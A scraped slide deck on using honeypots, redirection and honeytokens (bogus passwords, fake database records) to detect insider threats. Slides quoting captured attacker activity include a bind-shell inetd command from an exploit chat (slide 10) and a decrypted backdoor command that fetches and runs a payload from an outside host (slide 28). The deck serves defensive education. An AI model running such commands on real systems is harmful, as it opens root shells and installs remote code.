honeypots catching the insider threat your speaker
play

Honeypots: Catching the Insider Threat Your Speaker ! President, - PowerPoint PPT Presentation

Dec 21, 2022 •147 likes •676 views

Honeypots: Catching the Insider Threat Your Speaker ! President, Honeypot Technologies Inc. ! Founder, Honeynet Project & Moderator, honeypot mailing list ! Author, Honeypots: Tracking Hackers & Co- author, Know Your Enemy ! Work

  1. Honeypots: Catching the Insider Threat

  2. Your Speaker ! President, Honeypot Technologies Inc. ! Founder, Honeynet Project & Moderator, honeypot mailing list ! Author, Honeypots: Tracking Hackers & Co- author, Know Your Enemy ! Work primarily with government and military organizations. ! Officer, Rapid Deployment Force

  3. Purpose To introduce a novel approach on how to detect, identify, and gather information on the advancer insider threat.

  4. Disclaimer Some of the concepts here are based on the ARDA Cyber Indications and Warning workshop led by the Northeast Regional Research Center at MITRE.

  5. Agenda ! The Problem ! Honeypots ! Catching the Advanced Insider

  6. The Problem

  7. Initiative Your network and information is a static target. The threat can strike whenever they want, wherever they want, however they want. They have the initiative.

  8. Threats ! Targets of Opportunity ! Targets of Choice

  9. Targets of Opportunity ! Focus on compromising as many computers as possible, does not care which ones. ! Motives widely vary, but goal is the same. ! Primarily an external threat.

  10. Tool Use :_pen :do u have the syntax for sadmind exploit :D1ck :lol :D1ck :yes :_pen :what is it :D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p] :_pen : what do i do for -c :D1ck :heh :D1ck :u dont know? :_pen :no :D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"

  11. Anyone a target

  12. Not out for fun J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting

  13. Defending Against ! Defending against these threats is relatively simple, don’t be the easy kill. ! Simple to detect, identify, and gather information on.

  14. Targets of Choice ! Focus on specific systems of high value. ! Potentially highly skilled, may demonstrate new tools or techniques. ! Do not want to be detected. ! External and Internal threat

  15. Debian Attack ! Threat focused on specific systems of high value (CVS repository). ! Demonstrated new tools and techniques (kernel 2.4.22 exploit)

  16. Defending Against ! Difficult as attacker may often take their time so as not to be detected. ! New tools and techniques. ! Trusted Insider.

  17. Honeypots

  18. Initiative Honeypots allow you to take the initiative, they turn the tables on the bad guys.

  19. Honeypots A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.

  20. The Concept ! System has no production value, no authorized activity. ! Any interaction with the honeypot is most likely malicious in intent.

  21. Flexible Tool Honeypots do not solve a specific problem. Instead, they are a highly flexible tool with different applications to security.

  22. Advantages ! Collect small data sets of high value, simple to analyze and manage. ! Vastly reduce false positives. ! Catch new attacks. ! Work in encrypted or IPv6 environments. ! Minimal resources.

  23. Disadvantages ! Limited scope of view ! Risk

  24. Types of Honeypots ! Low-interaction ! High-interaction Interaction measures the amount of activity an attacker can have with a honeypot.

  25. Low-Interaction ! Emulates services and operating systems. ! Easy to deploy, minimal risk ! Captures limited information ! Examples include Honeyd, Specter, KFSensor

  26. High-interaction ! Provide real operating systems and services, no emulation. ! Complex to deploy, greater risk. ! Capture extensive information. ! Examples include ManTrap and Honeynets.

  27. Encrypted Backdoor 02/19-04:34:10.529350 206.123.208.5 -> 172.16.183.2 PROTO011 TTL:237 TOS:0x0 ID:13784 IpLen:20 DgmLen:422 02 00 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 ...5.7.=.8..6..H D3 5D D9 62 EF 6B A2 F4 2B AE 3E C3 52 89 CD 57 .].b.k..+.>.R..W DD 69 F2 6C E8 1F 8�E 29 B4 3B 8C D2 18 61 A9 F6 .i.l...).;...a.. 3B 84 CF 18 5D A5 EC 36 7B C4 15 64 B3 02 4B 91 ;...]..6{..d..K. 0E 94 1A 51 A6 DD 23 AE 32 B8 FF 7C 02 88 CD 58 ...Q..#.2..|...X D6 67 9E F0 27 A1 1C 53 99 24 A8 2F 66 B8 EF 7A .g..'..S.$./f..z F2 7B B2 F6 85 12 A3 20 57 D4 5A E0 25 B0 2E BF .{..... W.Z.%... F6 48 7F C4 0A 95 20 AA 26 AF 3C B8 EF 41 78 01 .H.... .&.<..Ax. 85 BC 00 89 06 3D BA 40 C6 0B 96 14 A5 DC 67 F2 .....=.@......g. 7C F8 81 0E 8A DC F3 0A 21 38 4F 66 7D 94 AB C2 |.......!8Of}... D9 F0 07 1E 35 4C 63 7A 91 A8 BF D6 ED 04 1B 32 ....5Lcz.......2 49 60 77 8E A5 BC D3 EA 01 18 2F 46 5D 74 8B A2 I`w......./F]t.. B9 D0 E7 FE 15 2C 43 5A 71 88 9F B6 CD E4 FB 12 .....,CZq....... 29 40 57 6E 85 9C B3 CA E1 F8 0F 26 3D 54 6B 82 )@Wn.......&=Tk.

  28. Decrypted Backdoor starting decode of packet size 420 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 D3 5D local buf of size 420 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73 ..killall -9 tts 65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75 erve ; lynx -sou 72 63 65 20 68 74 74 70 3A 2F 2F 31 39 32 2E 31 rce http://192.1 36 38 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F 68.103.2:8882/fo 6F 20 3E 20 2F 74 6D 70 2F 66 6F 6F 2E 74 67 7A o > /tmp/foo.tgz 20 3B 20 63 64 20 2F 74 6D 70 20 3B 20 74 61 72 ; cd /tmp ; tar 20 2D 78 76 7A 66 20 66 6F 6F 2E 74 67 7A 20 3B -xvzf foo.tgz ; 20 2E 2F 74 74 73 65 72 76 65 20 3B 20 72 6D 20 ./ttserve ; rm 2D 72 66 20 66 6F 6F 2E 74 67 7A 20 74 74 73 65 -rf foo.tgz ttse 72 76 65 3B 00 00 00 00 00 00 00 00 00 00 00 00 rve;............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

  29. Catching the Advanced Insider

  30. Concept Honeypots can be used to detect, identify, and capture advanced insider threats. Targeting a more advanced clientele.

  31. Two Approaches ! Redirection ! Honeytokens

  32. Redirection ! Honeypots must represent targets of high value. ! Don’t create new targets, use existing targets. ! Redirect malicious or unauthorized activity to honeypots. ! Monitor and capture threats activity.

  33. Two Steps ! The act of redirection represents an indication of unauthorized activity. ! Confirm intent by monitoring interaction with honeypot.

  34. Redirection

  35. Redirection On ! HotZoning ! Known attacks (Bait-n-Switch) ! Host based monitoring

  36. Hot Zoning ! Redirect all non-standard traffic to the Honeynet. For example: ! Non-production destination ports. ! Non-authorized source ports. ! Time of day.

  37. Bait-n-Switch ! Modified version of Snort that acts as an inline-gateway. ! Detected activity is redirected to honeypot. http://violating.us/projects/baitnswitch/

  38. Host Detection ! Monitor host for unauthorized activity, then redirect. ! PaX ! systrace(1)

  39. GenII Honeynet

  40. Honeypot Content ! Must be realistic environment. ! Use the same data and applications as real system. ! Advantage is you are monitoring attacker’s every action in highly controlled environment.

  41. Honeytokens ! Works on the concept the threat is not after a system, but information.

  42. Honeytokens ! Items that should not be used. ! Fake patient records ! Bogus SSN or CC numbers ! Emails ! Planted files or documents (ala Cuckoo’s Egg) ! Ability to call home

  43. Bogus Passwords ! Create bogus login/password combination, monitor for use. ! Plant in password files to determine if anyone is cracking them. ! Plant in emails or files to determine if anyone is reading them.

  44. Database Records ! JF Kennedy record in medical database ! Record no one has authorization to access. ! If accessed, indication of violation. ! Monitor individual.

  45. Database Redirection ! If record is accessed, individual is redirected to honeypot.

  46. Deployment Challenge ! How do you deploy distributed honeypots in very large networks?

  47. Honeypot Farms

  48. Bootable CDROM ! Boot into a Honeyd honeypot ! Boot into a full Honeynet using User- Mode-Linux. ! Boot into a Honeywall gateway for Honeynets.

  49. Summary ! Honeypots give us the initiative against advanced threats. ! Not only can they be used for detection and identification, but extensive information gathering.

  50. Resources ! Honeypot website ! www.tracking-hackers.com ! Honeypots maillist ! www.securityfocus.com/popups/forums/honeypots/faq.html

  51. Resources - Books ! Honeypots: Tracking Hackers ! www.tracking-hackers.com/book/

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Insider Threat Insider Threat (Database Intrusion Detection) 1 Insider Threats: Motivation and

Insider Threat Insider Threat (Database Intrusion Detection) 1 Insider Threats: Motivation and

Insider Threat Insider Threat (Database Intrusion Detection) 1 Insider Threats: Motivation and Challenges Challenges Mission critical information = High value target Threatens Government organizations and large corporations

435 views • 39 slides
Counterintelligence &amp; Insider Threat Detection National Insider Threat Special Interest Group

Counterintelligence &amp; Insider Threat Detection National Insider Threat Special Interest Group

Counterintelligence &amp; Insider Threat Detection National Insider Threat Special Interest Group July 18, 2017 Douglas D. Thomas Director, Counterintelligence Operations &amp; Corporate Investigations Lockheed Martin Counterintelligence

706 views • 16 slides
A FRAMEWORK TO EFFECTIVELY DEVELOP INSIDER THREAT CONTROLS Randy Trzeciak Dan Costa Director

A FRAMEWORK TO EFFECTIVELY DEVELOP INSIDER THREAT CONTROLS Randy Trzeciak Dan Costa Director

#RSAC SESSION ID: HUM-R02 A FRAMEWORK TO EFFECTIVELY DEVELOP INSIDER THREAT CONTROLS Randy Trzeciak Dan Costa Director Technical Solutions Team Lead CERT National Insider Threat Center CERT National Insider Threat Center Software

784 views • 35 slides
INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE

INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE

INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS INTELLIGENT HONEYNET ACTIONABLE INFORMATION FROM HONEYPOTS JOSH PYORRE Security Researcher Threat Analyst at NASA Threat Analyst at Mandiant @joshpyorre HONEYPOTS CURRENTLY IN USE

1.25k views • 96 slides
Detecting and Countering Insider Threats: the Insider Threat Can Policy-Based Access Control

Detecting and Countering Insider Threats: the Insider Threat Can Policy-Based Access Control

Introduction Insiders and Detecting and Countering Insider Threats: the Insider Threat Can Policy-Based Access Control Help? Trust and Trustworthi- ness Access Control and Trustwor- Jason Crampton 1 Michael Huth 2 thiness 1 Information

470 views • 25 slides
Human Resources Interaction With An Insider Threat Program 1 INTRODUCTION Davita N. Carpenter,

Human Resources Interaction With An Insider Threat Program 1 INTRODUCTION Davita N. Carpenter,

Human Resources Interaction With An Insider Threat Program 1 INTRODUCTION Davita N. Carpenter, SHRM-SCP Novetta Inc. Vice President, Human Resources/Employee Care Ethics/Compliance Officer Insider Threat Group Member 25+ years in Human

520 views • 16 slides
Behavioral Indicators of Insider Threat: Looking Forward Dr. Robert Gallagher Guardian Defense

Behavioral Indicators of Insider Threat: Looking Forward Dr. Robert Gallagher Guardian Defense

Behavioral Indicators of Insider Threat: Looking Forward Dr. Robert Gallagher Guardian Defense Group NITSIG Board Member Insider Threat Indicator Lists Everybody loves a list If we had a single and comprehensive list of THE behavioral

323 views • 9 slides
Nuclear Security Culture As a Tool to Address Insider Threat Dr. Igor Khripunov at The IAEA

Nuclear Security Culture As a Tool to Address Insider Threat Dr. Igor Khripunov at The IAEA

Nuclear Security Culture As a Tool to Address Insider Threat Dr. Igor Khripunov at The IAEA International Conference on Physical Protection, 13-17 November 2017, Vienna, Austria Overview Insider threat and the role of Nuclear Security

552 views • 15 slides
Conversations Around Insider and Organizational Threat Luke Osterritter losterritter@cmu.edu

Conversations Around Insider and Organizational Threat Luke Osterritter losterritter@cmu.edu

&lt;Your Name&gt; Conversations Around Insider and Organizational Threat Luke Osterritter losterritter@cmu.edu Center for Computational Analysis of Social and Organizational Systems http://www.casos.cs.cmu.edu/ What is an Insider

256 views • 21 slides
A Layered Approach to Insider Threat Detection and Proactive Forensics Phillip G. Bradford, Ning

A Layered Approach to Insider Threat Detection and Proactive Forensics Phillip G. Bradford, Ning

A Layered Approach to Insider Threat Detection and Proactive Forensics Phillip G. Bradford, Ning Hu University of Alabama Tuscaloosa, AL 35487 ACSAC Dec. 5-9, 2005 Insider threats Definition Menaces to computer security as a result of

131 views • 11 slides
Social Science Perspectives and Countering Insider Threat The Framework Social science is

Social Science Perspectives and Countering Insider Threat The Framework Social science is

Social Science Perspectives and Countering Insider Threat Overview What is a Social Scientist? Why M ethods M atter The Application of Social Science Questions? 1 Social Science Perspectives and Countering Insider Threat The

294 views • 11 slides
DATA LOSS PREVENTION AND PROTECTION Last Revised: 4-20-14 MD InfraGard Insider Threat Special

DATA LOSS PREVENTION AND PROTECTION Last Revised: 4-20-14 MD InfraGard Insider Threat Special

MD InfraGard Insider Threat MD InfraGard Insider Threat Special Interest Group Special Interest Group DATA LOSS PREVENTION AND PROTECTION Last Revised: 4-20-14 MD InfraGard Insider Threat Special Interest Group MD InfraGard Insider Threat

689 views • 49 slides
Combating the Insider Threat at the FBI: Real World Lessons Learned Patrick Reidy Disclaimer and

Combating the Insider Threat at the FBI: Real World Lessons Learned Patrick Reidy Disclaimer and

FEDERAL BUREAU OF INVESTIGATION Fidelity, Bravery, and Integrity Combating the Insider Threat at the FBI: Real World Lessons Learned Patrick Reidy Disclaimer and Introduction The views expressed in this presentation are those of the

931 views • 43 slides
Intrusion Detection w ith Motivation Honeypots What is a honeypot? Types of honeypots

Intrusion Detection w ith Motivation Honeypots What is a honeypot? Types of honeypots

Overview Intrusion Detection w ith Motivation Honeypots What is a honeypot? Types of honeypots What can you do with them? Claire OShea Problems with honeypots COMP 290 Spring 2005 Overview Motivation Examples of

645 views • 15 slides
How To Get Started IMPACT 2015 Phil Robinson 2 Video removed due to size constraints 3 Theme

How To Get Started IMPACT 2015 Phil Robinson 2 Video removed due to size constraints 3 Theme

Insider Threat Programs: How To Get Started IMPACT 2015 Phil Robinson 2 Video removed due to size constraints 3 Theme Insider Threat is NOT ONLY about protecting data on your network Risk: Tolerance/Avoidance/Acceptance

799 views • 54 slides
Security Hands-on @ Pavilion Stream + NetFlow for Security &amp; Insider Threat Detection Kelly

Security Hands-on @ Pavilion Stream + NetFlow for Security &amp; Insider Threat Detection Kelly

Security Hands-on @ Pavilion Stream + NetFlow for Security &amp; Insider Threat Detection Kelly Feagans | Sales Engineering September 2017 | Washington, DC Objective OBJECTIVE Learn how to use NetFlow with the Splunk Stream Forwarder for

444 views • 20 slides
Counting Outdated Honeypots: Legal and Useful Alexander Vetterl * , Richard Clayton * and Ian

Counting Outdated Honeypots: Legal and Useful Alexander Vetterl * , Richard Clayton * and Ian

Counting Outdated Honeypots: Legal and Useful Alexander Vetterl * , Richard Clayton * and Ian Walden *University of Cambridge, Queen Mary University of London 4th International Workshop on Traffic Measurements for Cybersecurity May 23,

423 views • 17 slides
Towards High-Interaction Virtual ICS Honeypots-in-a-Box D ANIELE A NTONIOLI A NAND A GRAWAL N. O.

Towards High-Interaction Virtual ICS Honeypots-in-a-Box D ANIELE A NTONIOLI A NAND A GRAWAL N. O.

CPS-SPC 16 @ Vienna AU Towards High-Interaction Virtual ICS Honeypots-in-a-Box D ANIELE A NTONIOLI A NAND A GRAWAL N. O. T IPPENHAUER daniele_antonioli@sutd.edu.sg Towards High-Interaction Virtual ICS Honeypots-in-a-Box 1 Overview In this

922 views • 25 slides
Using Honeypots for Security Operations Jim Barlow &lt;jbarlow@ncsa.uiuc.edu&gt; Head of

Using Honeypots for Security Operations Jim Barlow &lt;jbarlow@ncsa.uiuc.edu&gt; Head of

Using Honeypots for Security Operations Jim Barlow &lt;jbarlow@ncsa.uiuc.edu&gt; Head of Security Operations and Incident Response National Center for Supercomputing Applications (NCSA) University of Illinois at Urbana-Champaign National

229 views • 20 slides
Honeywords Making Password-Cracking Detectable By Ari Juels and Ronald L. Rivest Presented by

Honeywords Making Password-Cracking Detectable By Ari Juels and Ronald L. Rivest Presented by

Honeywords Making Password-Cracking Detectable By Ari Juels and Ronald L. Rivest Presented by Nunzio Cicone and Hans-Peter Hllwirth Setting Password Attacks Passwords are a notoriously weak authentication mechanism One significant

422 views • 20 slides
Honey, There is a Python in My Android Phone Ing Wei, Tang (James) About the Title: It was

Honey, There is a Python in My Android Phone Ing Wei, Tang (James) About the Title: It was

Honey, There is a Python in My Android Phone Ing Wei, Tang (James) About the Title: It was taken from: Honey, I have shrunk the kids! (1989) Source: https://en.wikipedia.org/wiki/Honey,_I_Shrunk _the_Kids Android Phone vs 486-DX4

539 views • 31 slides
321 Section, Week 2 Natalie Linnell All lions are fierce Discussion Some lions do not drink

321 Section, Week 2 Natalie Linnell All lions are fierce Discussion Some lions do not drink

321 Section, Week 2 Natalie Linnell All lions are fierce Discussion Some lions do not drink coffee Some fierce creatures do not drink coffee Translate into logic (provide defs for predicates) All lions are fierce All lions are fierce

300 views • 3 slides
Copies of the OSBA Profit and Loss Report and Balance Sheet are provided at the OSBA Table, as

Copies of the OSBA Profit and Loss Report and Balance Sheet are provided at the OSBA Table, as

Slide 1 OSBA Income- Jan.-Oct. 21, 2018 Research 11% Education 37% Operations 39% Member Services 14% Income Income- EDUCATION Income- MEMBER SERVICES Income- OPERATIONS Income- RESEARCH Copies of the OSBA Profit and Loss Report and

506 views • 14 slides
Fixed Similes: Measuring Aspects of the Relation between MWE Idiomatic Semantics and Syntactic

Fixed Similes: Measuring Aspects of the Relation between MWE Idiomatic Semantics and Syntactic

Fixed Similes: Measuring Aspects of the Relation between MWE Idiomatic Semantics and Syntactic Flexibility PANAGIOTIS KOURIS STELLA MARKANTONATOU YANIS MAISTROS SCHOOL OF ELECTRICAL AND SCHOOL OF ELECTRICAL AND INSTITUTE FOR LANGUAGE

466 views • 25 slides

More recommend